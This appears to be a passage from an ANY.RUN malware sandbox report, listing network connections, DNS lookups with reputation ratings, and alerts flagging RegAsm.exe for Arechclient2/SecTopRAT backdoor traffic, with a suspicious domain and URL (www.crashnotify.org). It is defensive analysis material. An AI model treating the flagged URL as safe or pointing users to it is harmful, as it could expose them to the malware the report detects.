MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3888
RUXIMICS.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
2112
msedge.exe
13.107.42.16:443
config.edge.skype.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
2112
msedge.exe
150.171.28.11:80
edge.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
2112
msedge.exe
92.123.104.45:443
copilot.microsoft.com
Akamai International B.V.
DE
whitelisted
2112
msedge.exe
104.21.32.1:443
www.crashnotify.org
CLOUDFLARENET
unknown
2112
msedge.exe
150.171.28.11:443
edge.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 20.73.194.208
  • 51.104.136.2
whitelisted
google.com
  • 142.250.186.46
whitelisted
edge.microsoft.com
  • 150.171.28.11
  • 150.171.27.11
whitelisted
config.edge.skype.com
  • 13.107.42.16
whitelisted
www.crashnotify.org
  • 104.21.32.1
  • 104.21.16.1
  • 104.21.64.1
  • 104.21.80.1
  • 104.21.96.1
  • 104.21.112.1
  • 104.21.48.1
unknown
copilot.microsoft.com
  • 92.123.104.45
  • 92.123.104.53
whitelisted
www.bing.com
  • 92.123.104.61
  • 92.123.104.53
  • 92.123.104.22
  • 92.123.104.18
  • 92.123.104.59
  • 92.123.104.26
  • 92.123.104.19
  • 92.123.104.30
  • 92.123.104.52
  • 2.16.241.218
  • 2.16.241.205
  • 2.16.241.201
  • 92.123.104.43
  • 92.123.104.32
  • 92.123.104.49
  • 92.123.104.33
  • 92.123.104.47
  • 92.123.104.67
  • 92.123.104.65
  • 92.123.104.8
whitelisted
update.googleapis.com
  • 142.250.185.227
whitelisted
edgeassetservice.azureedge.net
  • 40.90.65.144
whitelisted
www.googleapis.com
  • 142.250.185.138
  • 142.250.186.42
  • 142.250.181.234
  • 216.58.206.74
  • 142.250.186.138
  • 142.250.185.106
  • 142.250.185.234
  • 216.58.212.170
  • 142.250.185.74
  • 142.250.186.170
  • 142.250.186.106
  • 172.217.16.202
  • 142.250.185.170
  • 142.250.185.202
  • 142.250.186.74
  • 172.217.18.10
whitelisted

Threats

PID
Process
Class
Message
2112
msedge.exe
Not Suspicious Traffic
INFO [ANY.RUN] Cloudflare Network Error Logging (NEL)
2112
msedge.exe
Not Suspicious Traffic
INFO [ANY.RUN] Cloudflare Network Error Logging (NEL)
684
RegAsm.exe
A Network Trojan was detected
ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)
684
RegAsm.exe
A Network Trojan was detected
ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M3 (GET)
Process
Message
chrome.exe
RecursiveDirectoryCreate( C:\Users\admin\AppData\Local\Temp\pfnlqlzu.nne directory exists )
chrome.exe
RecursiveDirectoryCreate( C:\Users\admin\AppData\Local\Temp\fpq12l01.1om directory exists )
chrome.exe
RecursiveDirectoryCreate( C:\Users\admin\AppData\Local\Temp\n3flgi0v.tx5 directory exists )
chrome.exe
RecursiveDirectoryCreate( C:\Users\admin\AppData\Local\Temp\yuigr3xy.qdz directory exists )
chrome.exe
RecursiveDirectoryCreate( C:\Users\admin\AppData\Local\Temp\cfo4bcd2.dsm directory exists )
chrome.exe
RecursiveDirectoryCreate( C:\Users\admin\AppData\Local\Temp\itlrd3ge.b4c directory exists )
msedge.exe
RecursiveDirectoryCreate( C:\Users\admin\AppData\Local\Temp\tegw23i4.j3b directory exists )
msedge.exe
RecursiveDirectoryCreate( C:\Users\admin\AppData\Local\Temp\lrpr13co.5jo directory exists )
msedge.exe
RecursiveDirectoryCreate( C:\Users\admin\AppData\Local\Temp\cycea4ts.twt directory exists )
msedge.exe
RecursiveDirectoryCreate( C:\Users\admin\AppData\Local\Temp\nno5ults.yg4 directory exists )
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
www.crashnotify.org/4KpraPV2